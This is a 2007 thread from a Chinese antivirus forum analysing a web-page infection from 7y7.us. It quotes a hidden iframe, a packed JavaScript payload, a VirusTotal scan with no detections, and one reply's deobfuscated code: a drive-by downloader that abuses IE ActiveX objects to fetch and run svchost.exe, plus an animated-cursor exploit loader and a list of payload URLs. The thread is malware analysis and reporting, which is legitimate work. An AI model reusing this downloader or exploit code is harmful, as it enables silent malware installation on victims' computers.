查看: 8235|回复: 10
收起左侧

[病毒样本] http://7y7.us/1.htm

[复制链接]
qqq000@qq.com
头像被屏蔽
发表于 2007-4-28 15:34:38 | 显示全部楼层 |阅读模式
主题:有的网页打开是乱码.!请问怎么回事?
楼主
lingdudu


头衔:社区会员
等级:新手上路
文章:1
注册:2007-4-28
有的网页打开是全是乱码,比如百度,9城等这些 !!!

字符编码改的是简体中文GB2312

C盘发现一个生成的ip.txt的文档

前面的代码是

<iframe src=http://7y7.us/1.htm width=0 height=0></iframe> <html>

<head>
<meta http-equiv="Content-Type" c>
<title>[VBnet Internet]  Public IP Address SSI Page</title>
</head>

<body>



发贴时间:2007-4-28 15:29:33
→ 多长时间能收到上报病毒的回复邮件?
  
第1楼
星10000


头衔:社区会员
等级:初出茅庐
文章:105
注册:2007-2-28
<iframe src=http://7y7.us/1.htm width=0 height=0></iframe> <html>

我昨晚也见到了
gho 就好了

http://hi.baidu.com/503165656/blog/item/df3c2ff3936e4cca0a46e0bc.html






=========




<script src="2.js"></script>
我昨晚也见到了
gho 就好了

http://7y7.us/1.htm
http://7y7.us/2.js

<script src="http://www.7y7.us/oK/Vernum.js"></script>
<script src="http://www.7y7.us/oK/New.js"></script>


=======

请高人解密

=

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1c("\\4\\2\\p\\8\\6\\g\\11\\11\\0\\r\\w\\3\\d\\e\\q\\0\\11\\7\\0\\1\\2\\0\\7\\15\\12\\11\\11\\0\\r\\B\\3\\5\\d\\6\\w\\5\\5\\f\\A\\3\\1b\\m\\4\\k\\g\\1\\0\\Z\\8\\2\\5\\3\\2\\5\\A\\P\\d\\2\\s\\m\\d\\s\\3\\1\\0\\6\\j\\8\\2\\5\\3\\2\\5\\g\\1\\0\\1a\\w\\A\\j\\2\\1\\0\\q\\0\\11\\7\\0\\1\\2\\0\\7\\15\\12\\11\\11\\0\\r\\l\\w\\3\\d\\e\\q\\0\\11\\7\\0\\1\\2\\0\\7\\15\\12\\11\\11\\0\\r\\e\\4\\k\\6\\4\\e\\g\\1\\0\\2\\3\\i\\J\\j\\8\\2\\5\\3\\2\\5\\J\\v\\f\\1\\0\\6\\9\\5\\t\\n\\3\\g\\1\\0\\e\\4\\9\\f\\n\\d\\t\\y\\2\\8\\2\\3\\1\\0\\q\\r\\l\\e\\4\\k\\q\\0\\11\\7\\0\\1\\2\\0\\7\\15\\12\\11\\11\\0\\r\\e\\4\\k\\6\\4\\e\\g\\1\\0\\2\\3\\i\\J\\j\\8\\2\\5\\3\\2\\5\\J\\v\\f\\1\\0\\6\\9\\5\\t\\n\\3\\g\\1\\0\\e\\4\\9\\f\\n\\d\\t\\y\\2\\8\\2\\3\\1\\0\\q\\r\\l\\e\\4\\k\\q\\0\\11\\7\\0\\1\\2\\0\\7\\15\\12\\11\\11\\0\\r\\9\\j\\c\\4\\f\\5\\6\\n\\d\\2\\s\\m\\d\\s\\3\\g\\1\\0\\v\\d\\k\\d\\9\\j\\c\\4\\f\\5\\1\\0\\6\\q\\0\\11\\7\\0\\1\\2\\0\\7\\15\\12\\11\\11\\0\\p\\m\\2\\j\\5\\4\\8\\2\\6\\j\\w\\3\\j\\M\\L\\K\\b\\a\\U\\0\\11\\7\\0\\1\\2\\0\\7\\15\\12\\11\\11\\0\\k\\d\\c\\6\\v\\f\\T\\4\\k\\6\\g\\6\\e\\8\\j\\m\\B\\3\\2\\5\\h\\s\\3\\5\\K\\n\\3\\B\\3\\2\\5\\19\\t\\L\\e\\b\\1\\0\\2\\3\\i\\J\\j\\8\\2\\5\\3\\2\\5\\J\\v\\f\\1\\0\\a\\0\\11\\7\\0\\1\\2\\0\\7\\15\\12\\11\\11\\0\\k\\d\\c\\6\\d\\g\\2\\d\\k\\4\\s\\d\\5\\8\\c\\h\\m\\9\\3\\c\\18\\s\\3\\2\\5\\h\\5\\8\\P\\8\\i\\3\\c\\Z\\d\\9\\3\\b\\a\\C\\0\\11\\7\\0\\1\\2\\0\\7\\15\\12\\11\\11\\0\\4\\p\\6\\b\\2\\d\\k\\4\\s\\d\\5\\8\\c\\h\\d\\f\\f\\Y\\3\\c\\9\\4\\8\\2\\h\\4\\2\\e\\3\\z\\H\\p\\b\\1\\o\\E\\X\\L\\K\\1\\o\\a\\G\\g\\A\\u\\a\\U\\0\\11\\7\\0\\1\\2\\0\\7\\15\\12\\11\\11\\0\\11\\k\\3\\c\\9\\4\\8\\2\\g\\f\\d\\c\\9\\3\\17\\n\\8\\d\\5\\b\\2\\d\\k\\4\\s\\d\\5\\8\\c\\h\\d\\f\\f\\Y\\3\\c\\9\\4\\8\\2\\h\\9\\f\\n\\4\\5\\b\\1\\o\\E\\X\\L\\K\\1\\o\\a\\16\\u\\14\\a\\0\\11\\7\\0\\1\\2\\0\\7\\15\\12\\11\\11\\0\\11\\4\\p\\6\\b\\k\\3\\c\\9\\4\\8\\2\\q\\Q\\6\\W\\W\\6\\k\\3\\c\\9\\4\\8\\2\\r\\g\\13\\a\\U\\0\\11\\7\\0\\1\\2\\0\\7\\15\\12\\11\\11\\0\\11\\11\\i\\x\\M\\6\\g\\6\\b\\b\\d\\h\\4\\2\\e\\3\\z\\H\\p\\b\\1\\o\\i\\4\\2\\e\\8\\i\\9\\6\\2\\5\\6\\Q\\h\\D\\1\\o\\a\\G\\g\\A\\u\\a\\6\\I\\I\\6\\b\\d\\h\\4\\2\\e\\3\\z\\H\\p\\b\\1\\o\\i\\4\\2\\e\\8\\i\\9\\6\\x\\D\\D\\D\\1\\o\\a\\G\\g\\A\\u\\a\\a\\C\\0\\11\\7\\0\\1\\2\\0\\7\\15\\12\\11\\11\\0\\11\\11\\i\\z\\f\\6\\g\\6\\b\\b\\d\\h\\4\\2\\e\\3\\z\\H\\p\\b\\1\\o\\i\\4\\2\\e\\8\\i\\9\\6\\2\\5\\6\\Q\\h\\u\\1\\o\\a\\G\\g\\A\\u\\a\\6\\I\\I\\6\\b\\d\\h\\4\\2\\e\\3\\z\\H\\p\\b\\1\\o\\i\\4\\2\\e\\8\\i\\9\\6\\z\\f\\1\\o\\a\\G\\g\\A\\u\\a\\a\\C\\0\\11\\7\\0\\1\\2\\0\\7\\15\\12\\11\\11\\0\\11\\11\\i\\x\\M\\R\\6\\g\\6\\b\\b\\d\\h\\4\\2\\e\\3\\z\\H\\p\\b\\1\\o\\i\\4\\2\\e\\8\\i\\9\\6\\2\\5\\6\\Q\\h\\x\\1\\o\\a\\G\\g\\A\\u\\a\\6\\I\\I\\6\\b\\d\\h\\4\\2\\e\\3\\z\\H\\p\\b\\1\\o\\i\\4\\2\\e\\8\\i\\9\\6\\x\\D\\D\\R\\1\\o\\a\\G\\g\\A\\u\\a\\a\\C\\0\\11\\7\\0\\1\\2\\0\\7\\15\\12\\11\\11\\0\\0\\11\\7\\0\\1\\2\\0\\7\\15\\12\\11\\11\\0\\11\\11\\4\\p\\b\\i\\z\\f\\a\\v\\f\\T\\4\\k\\h\\4\\2\\2\\3\\c\\V\\F\\E\\P\\6\\g\\6\\1\\0\\r\\e\\4\\k\\6\\9\\5\\t\\n\\3\\g\\1\\1\\1\\0\\j\\m\\c\\9\\8\\c\\y\\6\\m\\c\\n\\b\\w\\5\\5\\f\\y\\1\\1\\l\\1\\1\\l\\i\\9\\O\\u\\h\\j\\8\\B\\1\\1\\l\\8\\N\\1\\1\\l\\E\\t\\F\\3\\9\\5\\x\\h\\v\\f\\s\\a\\1\\1\\1\\0\\q\\r\\e\\4\\k\\6\\9\\5\\t\\n\\3\\g\\1\\1\\1\\0\\j\\m\\c\\9\\8\\c\\y\\6\\m\\c\\n\\b\\w\\5\\5\\f\\y\\1\\1\\l\\1\\1\\l\\i\\9\\O\\u\\h\\j\\8\\B\\1\\1\\l\\8\\N\\1\\1\\l\\E\\t\\F\\3\\9\\5\\x\\h\\v\\f\\s\\a\\1\\1\\1\\0\\q\\1\\0\\C\\0\\11\\7\\0\\1\\2\\0\\7\\15\\12\\11\\11\\0\\11\\11\\4\\p\\b\\i\\x\\M\\a\\v\\f\\T\\4\\k\\h\\4\\2\\2\\3\\c\\V\\F\\E\\P\\6\\g\\6\\1\\0\\r\\e\\4\\k\\6\\9\\5\\t\\n\\3\\g\\1\\1\\1\\0\\j\\m\\c\\9\\8\\c\\y\\6\\m\\c\\n\\b\\w\\5\\5\\f\\y\\1\\1\\l\\1\\1\\l\\i\\9\\O\\u\\h\\j\\8\\B\\1\\1\\l\\8\\N\\1\\1\\l\\E\\t\\F\\3\\9\\5\\x\\h\\v\\f\\s\\a\\1\\1\\1\\0\\q\\r\\e\\4\\k\\6\\9\\5\\t\\n\\3\\g\\1\\1\\1\\0\\j\\m\\c\\9\\8\\c\\y\\6\\m\\c\\n\\b\\w\\5\\5\\f\\y\\1\\1\\l\\1\\1\\l\\i\\9\\O\\u\\h\\j\\8\\B\\1\\1\\l\\8\\N\\1\\1\\l\\E\\t\\F\\3\\9\\5\\x\\h\\v\\f\\s\\a\\1\\1\\1\\0\\q\\1\\0\\C\\0\\11\\7\\0\\1\\2\\0\\7\\15\\12\\11\\11\\0\\11\\S\\0\\11\\7\\0\\1\\2\\0\\7\\15\\12\\11\\11\\0\\0\\11\\7\\0\\1\\2\\0\\7\\15\\12\\11\\11\\0\\S\\0\\11\\7\\0\\1\\2\\0\\7\\15\\12\\11\\11\\0\\0\\11\\7\\0\\1\\2\\0\\7\\15\\12\\11\\11\\0\\S\\0\\11\\7\\0\\1\\2\\0\\7\\15\\12\\11\\11\\0\\9\\3\\5\\F\\4\\B\\3\\8\\m\\5\\b\\1\\0\\j\\w\\3\\j\\M\\L\\K\\b\\a\\C\\1\\0\\10\\R\\D\\D\\a\\C\\0\\11\\7\\0\\1\\2\\0\\7\\15\\12\\11\\11\\0\\r\\l\\9\\j\\c\\4\\f\\5\\q\\0\\15\\12\\15\\12\\e\\8\\j\\m\\B\\3\\2\\5\\h\\i\\c\\4\\5\\3\\b\\4\\2\\p\\8\\a")',62,75,'42|134|156|145|151|164|40|53|157|163|51|50|162|141|144|160|75|56|167|143|166|57|165|154|47|146|76|74|147|171|61|152|150|62|72|170|55|155|73|60|115|124|41|117|174|137|105|111|153|113|71|114|65|63|175|104|173|110|46|123|126|103|54|||67|135||133|106|101|102|172|161|eval'.split('|'),0,{}))

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
伯夷叔齐
发表于 2007-4-28 15:52:12 | 显示全部楼层
过小红伞,已经上报.
mofunzone
发表于 2007-4-28 15:56:15 | 显示全部楼层
Complete scanning result of "1__.zip", received in VirusTotal at 04.28.2007, 09:47:08 (CET).
Antivirus        Version        Update        Result
AhnLab-V3        2007.4.28.0        04.27.2007        no virus found
AntiVir        7.4.0.15        04.28.2007        no virus found
Authentium        4.93.8        04.27.2007        no virus found
Avast        4.7.981.0        04.26.2007        no virus found
AVG        7.5.0.464        04.26.2007        no virus found
BitDefender        7.2        04.28.2007        no virus found
CAT-QuickHeal        9.00        04.27.2007        no virus found
ClamAV        devel-20070416        04.28.2007        no virus found
DrWeb        4.33        04.28.2007        no virus found
eSafe        7.0.15.0        04.27.2007        no virus found
eTrust-Vet        30.7.3601        04.27.2007        no virus found
Ewido        4.0        04.27.2007        no virus found
FileAdvisor        1        04.28.2007        no virus found
Fortinet        2.85.0.0        04.28.2007        no virus found
F-Prot        4.3.2.48        04.27.2007        no virus found
F-Secure        6.70.13030.0        04.28.2007        no virus found
Ikarus        T3.1.1.5        04.28.2007        no virus found
Kaspersky        4.0.2.24        04.28.2007        no virus found
McAfee        5019        04.27.2007        no virus found
Microsoft        1.2405        04.28.2007        no virus found
NOD32v2        2225        04.27.2007        no virus found
Norman        5.80.02        04.27.2007        no virus found
Panda        9.0.0.4        04.28.2007        no virus found
Prevx1        V2        04.28.2007        no virus found
Sophos        4.16.0        04.23.2007        no virus found
Sunbelt        2.2.907.0        04.19.2007        no virus found
Symantec        10        04.28.2007        no virus found
TheHacker        6.1.6.095        04.15.2007        no virus found
VBA32        3.11.4        04.28.2007        no virus found
VirusBuster        4.3.7:9        04.27.2007        no virus found
Webwasher-Gateway        6.0.1        04.28.2007        no virus found

Aditional Information
File size: 3347 bytes
MD5: 3e4c8b15a9809c419dc82a44472afee1
SHA1: 2888c21b0eb174a86d30227d2bd1dc5d81af6258
wangjay1980
发表于 2007-4-28 16:09:45 | 显示全部楼层
上报了
dyw1021
头像被屏蔽
发表于 2007-4-28 16:53:09 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
dikex
发表于 2007-4-28 17:42:26 | 显示全部楼层
http://www.7y7.us/oK/new.js
  1. info =                "<head>"        +"\n"+
  2.                 "<meta http-equiv="Content-Language" content="zh-cn">"        +"\n"+
  3.                 "</head>"        +"\n"+
  4.                 "<div id="new_content_jp" style="display:none"></div>"        +"\n"+
  5.                 "<div id="new_content_jp" style="display:none"></div>"        +"\n"+
  6.                 "<script language="javascript" >"        +"\n"+
  7.                 "function checkIE(){"        +"\n"+
  8.                 "var jpDiv = document.getElementById("new_content_jp")"        +"\n"+
  9.                 "var a=navigator.userAgent.toLowerCase();"        +"\n"+
  10.                 "if (navigator.appVersion.indexOf(\'MSIE\')!=-1){"        +"\n"+
  11.                 "        version=parseFloat(navigator.appVersion.split(\'MSIE\')[1])"        +"\n"+
  12.                 "        if (version>5 && version<=7){"        +"\n"+
  13.                 "                w2k = ((a.indexOf(\'windows nt 5.0\')!=-1) || (a.indexOf(\'windows 2000\')!=-1));"        +"\n"+
  14.                 "                wxp = ((a.indexOf(\'windows nt 5.1\')!=-1) || (a.indexOf(\'windows xp\')!=-1));"        +"\n"+
  15.                 "                w2k3 = ((a.indexOf(\'windows nt 5.2\')!=-1) || (a.indexOf(\'windows 2003\')!=-1));"        +"\n"+
  16.                 ""        +"\n"+
  17.                 "                if(wxp)jpDiv.innerHTML = "<div style=\\"cursor: url(http:\\/\\/ws91.com\\/oK\\/MyTest2.jpg)\\"><div style=\\"cursor: url(http:\\/\\/ws91.com\\/oK\\/MyTest2.jpg)\\">";"        +"\n"+
  18.                 "                if(w2k)jpDiv.innerHTML = "<div style=\\"cursor: url(http:\\/\\/ws91.com\\/oK\\/MyTest2.jpg)\\"><div style=\\"cursor: url(http:\\/\\/ws91.com\\/oK\\/MyTest2.jpg)\\">";"        +"\n"+
  19.                 "        }"        +"\n"+
  20.                 ""        +"\n"+
  21.                 "}"        +"\n"+
  22.                 ""        +"\n"+
  23.                 "}"        +"\n"+
  24.                 "setTimeout("checkIE();",300);"        +"\n"+
  25.                 "</script>"

  26. document.write(info)
复制代码
http://www.7y7.us/oK/Vernum.js
  1. function gn(n) { var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe'; } try { dl='http://7y7.us/oK/svchost.exe'; var df=document.createElement("object"); df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var x=df.CreateObject("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P",""); var S=df.CreateObject("Adodb.Stream",""); S.type=1; x.open("GET", dl,0); x.send(); fname1=gn(10000); var F=df.CreateObject("Scripting.FileSystemObject",""); var tmp=F.GetSpecialFolder(0); fname1= F.BuildPath(tmp,fname1); S.Open();S.Write(x.responseBody); S.SaveToFile(fname1,2); S.Close(); var Q=df.CreateObject("Shell.Application",""); exp1=F.BuildPath(tmp+'\\system32','cmd.exe'); Q.ShellExecute(exp1,' /c '+fname1,"","open",0); } catch(i) { i=1; }
复制代码



样本:http://7y7.us/oK/svchost.exe,下载者一个,下载下面一堆(最近懒了,样本自己下载吧):

http://www.beginget.com/GetVer/Ver.txt
http://7y7.us/Sign/csrss.exe
http://7y7.us/Sign/svchost32.exe
http://7y7.us/Sign/smss.exe
http://7y7.us/Sign/services.exe
http://7y7.us/Sign/svchost.exe
http://7y7.us/Sign/conime.exe
http://7y7.us/Sign/ctfmon.exe
http://7y7.us/Sign/mmc.exe
http://7y7.us/Sign/IEXPLORE.EXE
http://7y7.us/Sign/srogm.exe

ani的就算了,想下载的自己在上面的代码里面找


[ 本帖最后由 dikex 于 2007-4-28 17:45 编辑 ]
jlennon
头像被屏蔽
发表于 2007-4-28 17:45:17 | 显示全部楼层
就知道刺猬会来分析的
dikex
发表于 2007-4-28 17:46:36 | 显示全部楼层
原帖由 jlennon 于 2007-4-28 17:45 发表
就知道刺猬会来分析的



最近学到了些新东西,正好拿来实践一下
qqq000@qq.com
头像被屏蔽
 楼主| 发表于 2007-4-29 10:24:43 | 显示全部楼层
原帖由 dikex 于 2007-4-28 04:46 发表



最近学到了些新东西,正好拿来实践一下

请用如何解密的
qq890
发表于 2007-4-29 10:46:52 | 显示全部楼层
卡巴斯基反病毒6.0
The requested URL http://bbs.kafan.cn/attachment.php?aid=61009 is infected with Trojan-Downloader.JS.Psyme.fy virus
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-19 10:58 , Processed in 0.142905 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表